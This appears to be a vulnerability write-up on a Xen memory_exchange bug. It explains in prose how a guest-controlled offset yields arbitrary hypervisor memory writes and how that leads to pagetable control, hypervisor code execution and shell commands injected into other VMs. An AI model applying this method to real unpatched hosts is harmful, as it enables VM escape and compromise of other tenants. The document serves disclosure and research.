Xen normally only checks that addr points into the userspace area or the kernel area without checking size. If the actual guest memory access starts roughly at addr, proceeds linearly without skipping gigantic amounts of memory and bails out as soon as a guest memory access fails, only checking addr is sufficient because of the large range of non-canonical addresses, which serve as a large guard area. However, if a hypercall wants to access a guest buffer starting at a 64-bit offset, it needs to ensure that the access_ok() check is performed using the correct offset - checking the whole userspace buffer is unsafe!
Xen provides wrappers around access_ok() for accessing arrays in guest memory. If you want to check whether it's safe to access an array starting at element 0, you can use guest_handle_okay(hnd, nr). However, if you want to check whether it's safe to access an array starting at a different element, you need to use guest_handle_subrange_okay(hnd, first, last).
When I saw the definition of access_ok(), the lack of security guarantees it actually provides seemed rather unintuitive to me, so I started searching for its callers, wondering whether anyone might be using it in an unsafe way.

Hypercall Preemption

When e.g. a scheduler tick happens, Xen needs to be able to quickly switch from the currently executing vCPU to another VM's vCPU. However, simply interrupting the execution of a hypercall won't work (e.g. because the hypercall could be holding a spinlock), so Xen (like other operating systems) needs some mechanism to delay the vCPU switch until it's safe to do so.
In Xen, hypercalls are preempted using voluntary preemption: Any long-running hypercall code is expected to regularly call hypercall_preempt_check() to check whether the scheduler wants to schedule to another vCPU. If this happens, the hypercall code exits to the guest, thereby signalling to the scheduler that it's safe to preempt the currently-running task, after adjusting the hypercall arguments (in guest registers or guest memory) so that as soon as the current vCPU is scheduled again, it will re-enter the hypercall and perform the remaining work. Hypercalls don't distinguish between normal hypercall entry and hypercall re-entry after preemption.
This hypercall re-entry mechanism is used in Xen because Xen does not have one hypervisor stack per vCPU; it only has one hypervisor stack per physical core. This means that while other operating systems (e.g. Linux) can simply leave the state of an interrupted syscall on the kernel stack, Xen can't do that as easily.
This design means that for some hypercalls, to allow them to properly resume their work, additional data is stored in guest memory that could potentially be manipulated by the guest to attack the hypervisor.

memory_exchange()

The hypercall HYPERVISOR_memory_op(XENMEM_exchange, arg) invokes the function memory_exchange(arg) in xen/common/memory.c. This function allows a guest to "trade in" a list of physical pages that are currently assigned to the guest in exchange for new physical pages with different restrictions on their physical contiguity. This is useful for guests that want to perform DMA, because DMA requires physically contiguous buffers.
The hypercall takes a struct xen_memory_exchange as argument, which is defined as follows:
struct xen_memory_reservation {
    /* [...] */
    XEN_GUEST_HANDLE(xen_pfn_t) extent_start; /* in: physical page list */

    /* Number of extents, and size/alignment of each (2^extent_order pages). */
    xen_ulong_t    nr_extents;
    unsigned int   extent_order;

    /* XENMEMF flags. */
    unsigned int   mem_flags;

    /*
     * Domain whose reservation is being changed.
     * Unprivileged domains can specify only DOMID_SELF.
     */
    domid_t        domid;
};

struct xen_memory_exchange {
    /*
     * [IN] Details of memory extents to be exchanged (GMFN bases).
     * Note that @in.address_bits is ignored and unused.
     */
    struct xen_memory_reservation in;

    /*
     * [IN/OUT] Details of new memory extents.
     * We require that:
     *  1. @in.domid == @out.domid
     *  2. @in.nr_extents  << @in.extent_order ==
     *     @out.nr_extents << @out.extent_order
     *  3. @in.extent_start and @out.extent_start lists must not overlap
     *  4. @out.extent_start lists GPFN bases to be populated
     *  5. @out.extent_start is overwritten with allocated GMFN bases
     */
    struct xen_memory_reservation out;

    /*
     * [OUT] Number of input extents that were successfully exchanged:
     *  1. The first @nr_exchanged input extents were successfully
     *     deallocated.
     *  2. The corresponding first entries in the output extent list correctly
     *     indicate the GMFNs that were successfully exchanged.
     *  3. All other input and output extents are untouched.
     *  4. If not all input extents are exchanged then the return code of this
     *     command will be non-zero.
     *  5. THIS FIELD MUST BE INITIALISED TO ZERO BY THE CALLER!
     */
    xen_ulong_t nr_exchanged;
};
The fields that are relevant for the bug are in.extent_start, in.nr_extents, out.extent_start, out.nr_extents and nr_exchanged.
nr_exchanged is documented as always being initialized to zero by the guest - this is because it is not only used to return a result value, but also for hypercall preemption. When memory_exchange() is preempted, it stores its progress in nr_exchanged, and the next execution of memory_exchange() uses the value of nr_exchanged to decide at which point in the input arrays in.extent_start and out.extent_start it should resume.
Originally, memory_exchange() did not check the userspace array pointers at all before accessing them with __copy_from_guest_offset() and __copy_to_guest_offset(), which do not perform any checks themselves - so by supplying hypervisor pointers, it was possible to cause Xen to read from and write to hypervisor memory - a pretty severe bug. This was discovered in 2012 (XSA-29, CVE-2012-5513) and fixed as follows:
diff --git a/xen/common/memory.c b/xen/common/memory.c
index 4e7c234..59379d3 100644
--- a/xen/common/memory.c
+++ b/xen/common/memory.c
@@ -289,6 +289,13 @@ static long memory_exchange(XEN_GUEST_HANDLE(xen_memory_exchange_t) arg)
         goto fail_early;
     }
 
+    if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||
+         !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )
+    {
+        rc = -EFAULT;
+        goto fail_early;
+    }
+
     /* Only privileged guests can allocate multi-page contiguous extents. */
     if ( !multipage_allocation_permitted(current->domain,
                                          exch.in.extent_order) ||

The bug

As can be seen in the following code snippet, the 64-bit resumption offset nr_exchanged, which can be controlled by the guest because of Xen's hypercall resumption scheme, can be used by the guest to choose an offset from out.extent_start at which the hypervisor should write:
static long memory_exchange(XEN_GUEST_HANDLE_PARAM(xen_memory_exchange_t) arg)
{
    [...]

    /* Various sanity checks. */
    [...]

    if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||
         !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )
    {
        rc = -EFAULT;
        goto fail_early;
    }

    for ( i = (exch.nr_exchanged >> in_chunk_order);
          i < (exch.in.nr_extents >> in_chunk_order);
          i++ )
    {
        [...]
        /* Assign each output page to the domain. */
        for ( j = 0; (page = page_list_remove_head(&out_chunk_list)); ++j )
        {
            [...]
            if ( !paging_mode_translate(d) )
            {
                [...]
                if ( __copy_to_guest_offset(exch.out.extent_start,
                                            (i << out_chunk_order) + j,
                                            &mfn, 1) )
                    rc = -EFAULT;
            }
        }
        [...]
    }
    [...]
}
However, the guest_handle_okay() check only checks whether it would be safe to access the guest array exch.out.extent_start starting at offset 0; guest_handle_subrange_okay() would have been correct. This means that an attacker can write an 8-byte value to an arbitrary address in hypervisor memory by choosing:
  • exch.in.extent_order and exch.out.extent_order as 0 (exchanging page-sized blocks of physical memory for new page-sized blocks)
  • exch.out.extent_start and exch.nr_exchanged so that exch.out.extent_start points to userspace memory while exch.out.extent_start+8*exch.nr_exchanged points to the target address in hypervisor memory, with exch.out.extent_start close to NULL; this can be calculated as exch.out.extent_start=target_addr%8, exch.nr_exchanged=target_addr/8.
  • exch.in.nr_extents and exch.out.nr_extents as exch.nr_exchanged+1
  • exch.in.extent_start as input_buffer-8*exch.nr_exchanged (where input_buffer is a legitimate guest kernel pointer to a physical page number that is currently owned by the guest). This is guaranteed to always point to the guest userspace range (and therefore pass the access_ok() check) because exch.out.extent_start roughly points to the start of the userspace address range and the hypervisor and guest kernel address ranges together are only as big as the userspace address range.

The value that is written to the attacker-controlled address is a physical page number (physical address divided by the page size).

Exploiting the bug: Gaining pagetable control

Especially on a busy system, controlling the page numbers that are written by the kernel might be difficult. Therefore, for reliable exploitation, it makes sense to treat the bug as a primitive that permits repeatedly writing 8-byte values at controlled addresses, with the most significant bits being zeroes (because of the limited amount of physical memory) and the least significant bits being more or less random. For my exploit, I decided to treat this primitive as one that writes an essentially random byte followed by seven bytes of garbage.
It turns out that for an x86-64 PV guest, such a primitive is sufficient for reliably exploiting the hypervisor for the following reasons:
  • x86-64 PV guests know the real physical page numbers of all pages they can access
  • x86-64 PV guests can map live pagetables (from all four paging levels) belonging to their domain as readonly; Xen only prevents mapping them as writable
  • Xen maps all physical memory as writable at 0xffff830000000000 (in other words, the hypervisor can write to any physical page, independent of the protections using which it is mapped in other places, by writing to physical_address+0xffff830000000000).

The goal of the attack is to point an entry in a live level 3 pagetable (which I'll call "victim pagetable") to a page to which the guest has write access (which I'll call "fake pagetable"). This means that the attacker has to write an 8-byte value, containing the physical page number of the fake pagetable and some flags, into an entry in the victim pagetable, and ensure that the following 8-byte pagetable entry stays disabled (e.g. by setting the first byte of the following entry to zero). Essentially, the attacker has to write 9 controlled bytes followed by 7 bytes that don't matter.
Because the physical page numbers of all relevant pages and the address of the writable mapping of all physical memory are known to the guest, figuring out where to write and what value to write is easy, so the only remaining problem is how to use the primitive to actually write data.
Because the attacker wants to use the primitive to write to a readable page, the "write one random byte followed by 7 bytes of garbage" primitive can easily be converted to a "write one controlled byte followed by 7 bytes of garbage" primitive by repeatedly writing a random byte and reading it back until the value is right. Then, the "write one controlled byte followed by 7 bytes of garbage" primitive can be converted to a "write controlled data followed by 7 bytes of garbage" primitive by writing bytes to consecutive addresses - and that's exactly the primitive needed for the attack.
At this point, the attacker can control a live pagetable, which allows the attacker to map arbitrary physical memory into the guest's virtual address space. This means that the attacker can reliably read from and write to the memory, both code and data, of the hypervisor and all other VMs on the system.

Running shell commands in other VMs

At this point, the attacker has full control over the machine, equivalent to the privilege level of the hypervisor, and can easily steal secrets by searching through physical memory; and a realistic attacker probably wouldn't want to inject code into VMs, considering how much more detectable that makes an attack.
But running an arbitrary shell command in other VMs makes the severity more obvious (and it looks cooler), so for fun, I decided to continue my exploit so that it injects a shell command into all other 64-bit PV domains.
As a first step, I wanted to reliably gain code execution in hypervisor context. Given the ability to read and write physical memory, one relatively OS- (or hypervisor-)independent way to call an arbitrary address with kernel/hypervisor privileges is to locate the Interrupt Descriptor Table using the unprivileged SIDT instruction, write an IDT entry with DPL 3 and raise the interrupt. (Intel's upcoming Cannon Lake CPUs are apparently going to support User-Mode Instruction Prevention (UMIP), which will finally make SIDT a privileged instruction.) Xen supports SMEP and SMAP, so it isn't possible to just point the IDT entry at guest memory, but using the ability to write pagetable entries, it is possible to map a guest-owned page with hypervisor-context shellcode as non-user-accessible, which allows it to run despite SMEP.
Then, in hypervisor context, it is possible to hook the syscall entry point by reading and writing the IA32_LSTAR MSR. The syscall entry point is used both for syscalls from guest userspace and for hypercalls from guest kernels. By mapping an attacker-controlled page into guest-user-accessible memory, changing the register state and invoking sysret, it is possible to divert the execution of guest userspace code to arbitrary guest user shellcode, independent of the hypervisor or the guest operating system.
My exploit injects shellcode into all guest userspace processes that is invoked on every write() syscall. Whenever the shellcode runs, it checks whether it is running with root privileges and whether a lockfile doesn't exist in the guest's filesystem yet. If these conditions are fulfilled, it uses the clone() syscall to create a child process that runs an arbitrary shell command.
(Note: My exploit doesn't clean up after itself on purpose, so when the attacking domain is shut down later, the hooked entry point will quickly cause the hypervisor to crash.)
Here is a screenshot of a successful attack against Qubes OS 3.2, which uses Xen as its hypervisor. The exploit is executed in the unprivileged domain "test124"; the screenshot shows that it injects code into dom0 and the firewallvm:

Conclusion

I believe that the root cause of this issue was the weak security guarantees made by access_ok(). The current version of access_ok() was committed in 2005, two years after the first public release of Xen and long before the first XSA was released. It seems that old code tends to contain relatively straightforward weaknesses more often than newer code, because it was committed with less scrutiny regarding security issues, and such old code is then often left alone.
When security-relevant code is optimized based on assumptions, care must be taken to reliably prevent those assumptions from being violated. access_ok() actually used to check whether the whole range overlaps hypervisor memory, which would have prevented this bug from occurring. Unfortunately, in 2005, a commit with "x86_64 fixes/cleanups" was made that changed the behavior of access_ok() on x86_64 to the current one. As far as I can tell, the only reason this didn't immediately make the MEMOP_increase_reservation and MEMOP_decrease_reservation hypercalls vulnerable is that the nr_extents argument of do_dom_mem_op() was only 32 bits wide - a relatively brittle defense.
While there have been several Xen vulnerabilities that only affected PV guests because the issues were in code that is unnecessary when dealing with HVM guests, I believe that this isn't one of them. Accessing guest virtual memory is much more straightforward for PV guests than for HVM guests: For PV guests, raw_copy_from_guest() calls copy_from_user(), which basically just does a bounds check followed by a memcpy with pagefault fixup - the same thing normal operating system kernels do when accessing userspace memory. For HVM guests, raw_copy_from_guest() calls copy_from_user_hvm(), which has to do a page-wise copy (because the memory area might be physically non-contiguous and the hypervisor doesn't have a contiguous virtual mapping of it) with guest pagetable walks (to translate guest virtual addresses to guest physical addresses) and guest frame lookups for every page, including reference counting, mapping guest pages into hypervisor memory and various checks to e.g. prevent HVM guests from writing to readonly grant mappings. So for HVM, the complexity of handling guest memory accesses is actually higher than for PV.
For security researchers, I think that a lesson from this is that paravirtualization is not much harder to understand than normal kernels. If you've audited kernel code before, the hypercall entry path (lstar_enter and int80_direct_trap in xen/arch/x86/x86_64/entry.S) and the basic design of hypercall handlers (for x86 PV: listed in the pv_hypercall_table in xen/arch/x86/pv/hypercall.c) should look more or less like normal syscalls.
